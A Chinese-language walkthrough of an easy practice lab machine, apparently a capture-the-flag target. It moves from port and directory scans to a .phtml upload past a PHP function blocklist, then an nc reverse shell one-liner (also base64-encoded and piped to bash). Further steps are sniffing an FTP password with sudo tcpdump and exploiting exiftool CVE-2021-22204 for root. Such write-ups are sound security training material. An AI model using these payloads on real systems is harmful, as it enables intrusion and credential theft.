难度:easy

kali:192.168.1.105

靶机:192.168.1.107

端口扫描

root@kali2 [~/Desktop] ➜   nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.107                                                                                                                                                     [12:35:55]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 12:36 CST
Nmap scan report for 192.168.1.107
Host is up (0.000074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:42:CA:CC (Oracle VirtualBox virtual NIC)
root@kali2 [~/Desktop] ➜  nmap 192.168.1.107 -sV -A -p22,80                                                                                                                                                                        [12:36:10]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 12:36 CST
Nmap scan report for 192.168.1.107
Host is up (0.00020s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
|   256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_  256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:42:CA:CC (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web探测

OtR3aM.png
是个apache的默认界面,扫一下目录

root@kali2 [~/Desktop] ➜  gobuster dir -u http://192.168.1.107 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                     [12:36:42]

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.107
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,bak,zip,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 69957]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

只有一个info.php
OtRCNG.png
OtRwE1.png
源码发现一个目录/S3cR3t
OttMuI.png
OttaFD.png
可以文件上传,稳啦
测试发现后缀名.php不能上传,但是.phtml可以上传
Ottq96.png
发现上传到files目录
OttBUP.png
但是不能命令执行
OttTyb.png
好多命令执行的函数被ban了,好眼熟的题目,buuctf上面好像也有一道

disable function bypass

绕过可参考这个项目https://github.com/mm0r1/exploits/tree/master
测试了一下,第一个就能绕过
OttzIK.png
把pwn这里改成自己想要执行的命令然后发过去
Otthha.png
OttiRS.png
可以看到成功rce,然后改成反弹shell的指令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.105 4567 >/tmp/f

echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEwNSA0NTY3ID4vdG1wL2Y= |base64 -d |bash

root@kali2 [~/Desktop]nc -lvnp 4567                                                                                                                                                                                            [12:44:50]
listening on [any] 4567 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.107] 47718
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

ftp密码dump

www-data@dejavu:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 May 12  2022 .
drwxr-xr-x 19 root   root   4096 May 12  2022 ..
drwxr-xr-x  5 robert robert 4096 May 13  2022 robert

home下只有一个用户,www-data用户无权限的读取,想办法提权到robert

www-data@dejavu:/home$ sudo -l
Matching Defaults entries for www-data on dejavu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on dejavu:
    (robert) NOPASSWD: /usr/sbin/tcpdump

OttnjN.png
适当修改一下

```bash
tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
20 packets received by filter
0 packets dropped by kernel
www-data@dejavu:/tmp$ compress_savefile: execlp(id, /dev/null) failed: Permission denied
^C

没权限0.0,两个网卡都测了一下都失败。在后续的信息收集中发现有个用户会定时连接ftp
Ott7UC.png

www-data@dejavu:/tmp$ cat /etc/passwd | grep 1000    
robert:x:1000:1000:Dejavu:/home/robert:/bin/bash

正是robert用户,tcpdump抓包看看有没有泄露密码

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
06:03:01.807335 IP localhost.37552 > localhost.ftp: Flags [S], seq 1485197318, win 65495, options [mss 65495,sackOK,TS val 4279883089 ecr 0,nop,wscale 7], length 0
06:03:01.807343 IP localhost.ftp > localhost.37552: Flags [S.], seq 857873395, ack 1485197319, win 65483, options [mss 65495,sackOK,TS val 4279883089 ecr 4279883089,nop,wscale 7], length 0
06:03:01.807348 IP localhost.37552 > localhost.ftp: Flags [.], ack 1, win 512, options [nop,nop,TS val 4279883089 ecr 4279883089], length 0
06:03:01.808085 IP localhost.ftp > localhost.37552: Flags [P.], seq 1:21, ack 1, win 512, options [nop,nop,TS val 4279883090 ecr 4279883089], length 20: FTP: 220 (vsFTPd 3.0.3)
06:03:01.808199 IP localhost.37552 > localhost.ftp: Flags [.], ack 21, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 0
06:03:01.808288 IP localhost.37552 > localhost.ftp: Flags [P.], seq 1:14, ack 21, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 13: FTP: USER robert
06:03:01.808290 IP localhost.ftp > localhost.37552: Flags [.], ack 14, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 0
06:03:01.808303 IP localhost.ftp > localhost.37552: Flags [P.], seq 21:55, ack 14, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 34: FTP: 331 Please specify the password.
06:03:01.808308 IP localhost.37552 > localhost.ftp: Flags [.], ack 55, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 0
06:03:01.808312 IP localhost.37552 > localhost.ftp: Flags [P.], seq 14:32, ack 55, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 18: FTP: PASS 9737bo0hFx4
06:03:01.808313 IP localhost.ftp > localhost.37552: Flags [.], ack 32, win 512, options [nop,nop,TS val 4279883090 ecr 4279883090], length 0
06:03:01.819652 IP localhost.ftp > localhost.37552: Flags [P.], seq 55:78, ack 32, win 512, options [nop,nop,TS val 4279883102 ecr 4279883090], length 23: FTP: 230 Login successful.
06:03:01.819656 IP localhost.37552 > localhost.ftp: Flags [.], ack 78, win 512, options [nop,nop,TS val 4279883102 ecr 4279883102], length 0
06:03:01.819695 IP localhost.37552 > localhost.ftp: Flags [P.], seq 32:38, ack 78, win 512, options [nop,nop,TS val 4279883102 ecr 4279883102], length 6: FTP: QUIT
06:03:01.820009 IP localhost.ftp > localhost.37552: Flags [.], ack 38, win 512, options [nop,nop,TS val 4279883102 ecr 4279883102], length 0
06:03:01.820098 IP localhost.ftp > localhost.37552: Flags [P.], seq 78:92, ack 38, win 512, options [nop,nop,TS val 4279883102 ecr 4279883102], length 14: FTP: 221 Goodbye.
06:03:01.820099 IP localhost.37552 > localhost.ftp: Flags [.], ack 92, win 512, options [nop,nop,TS val 4279883102 ecr 4279883102], length 0
06:03:01.820302 IP localhost.37552 > localhost.ftp: Flags [F.], seq 38, ack 92, win 512, options [nop,nop,TS val 4279883102 ecr 4279883102], length 0
06:03:01.821007 IP localhost.ftp > localhost.37552: Flags [F.], seq 92, ack 39, win 512, options [nop,nop,TS val 4279883103 ecr 4279883102], length 0
06:03:01.821011 IP localhost.37552 > localhost.ftp: Flags [.], ack 93, win 512, options [nop,nop,TS val 4279883103 ecr 4279883103], length 0

看到了PASS 9737bo0hFx4,用其切换用户成功

www-data@dejavu:/tmp$ su robert
Password: 
robert@dejavu:/tmp$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(pcap)

CVE-2021-22204

robert@dejavu:~$ sudo -l
Matching Defaults entries for robert on dejavu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User robert may run the following commands on dejavu:
    (root) NOPASSWD: /usr/local/bin/exiftool

直接写个公钥在root里面

robert@dejavu:~$ sudo exittool -filename=/root/.ssh/authorized_keys authorized_keys                      
Error: '/root/.ssh/authorized_keys' already exists - authorized_keys
    0 image files updated
    1 files weren't updated due to errors

传时候发现已经有公钥了,直接读取私钥看看


robert@dejavu:~$ sudo exiftool -filename=a.txt /root/.ssh/id_rsa
Error: File not found - /root/.ssh/id_rsa
    0 image files updated
    1 files weren't updated due to errors
robert@dejavu:~$

我擦,没有私钥,后来测试发现尽管能移动文件,但是也还是读取不了
然后对着exiftool搜索一番,发现一个cve可以rce,简单看了一下原理有点复杂,详情参考
https://xz.aliyun.com/t/9762?time__1311=n4%2BxnD0DuDRDB0DyADgDBqOorIhADfx20xxhiTD
github上面有个exp,https://github.com/convisolabs/CVE-2021-22204-exiftool
先运行python文件生成一个djvu文件,然后用exiftool查看这文件

robert@dejavu:~$ python3 exp.py
Config file not found
Warning: Sorry, HasselbladExif is not writable
Nothing to do.
robert@dejavu:~$ ls
a.txt            auth.sh       exp.py  msf.jpg  payload.bzz
authorized_keys  exploit.djvu  id_rsa  payload  user.txt
robert@dejavu:~$ sudo -l 
Matching Defaults entries for robert on dejavu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User robert may run the following commands on dejavu:
    (root) NOPASSWD: /usr/local/bin/exiftool
robert@dejavu:~$ sudo /usr/local/bin/exiftool exploit.djvu
ExifTool Version Number         : 12.23
File Name                       : exploit.djvu
Directory                       : .
File Size                       : 337 bytes
File Modification Date/Time     : 2024:08:20 06:27:40+00:00
File Access Date/Time           : 2024:08:20 06:27:40+00:00
File Inode Change Date/Time     : 2024:08:20 06:27:40+00:00
File Permissions                : -rw-rw-r--
File Type                       : DJVU
File Type Extension             : djvu
MIME Type                       : image/vnd.djvu
Image Width                     : 1
Image Height                    : 1
DjVu Version                    : 0.24
Spatial Resolution              : 300
Gamma                           : 2.2
Orientation                     : Horizontal (normal)
Image Size                      : 1x1
Megapixels                      : 0.000001
root@kali2 [~/Desktop]nc -lvnp 4567                                                                                                                                                                                            [14:29:11]
listening on [any] 4567 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.107] 47848
# id
uid=0(root) gid=0(root) groups=0(root)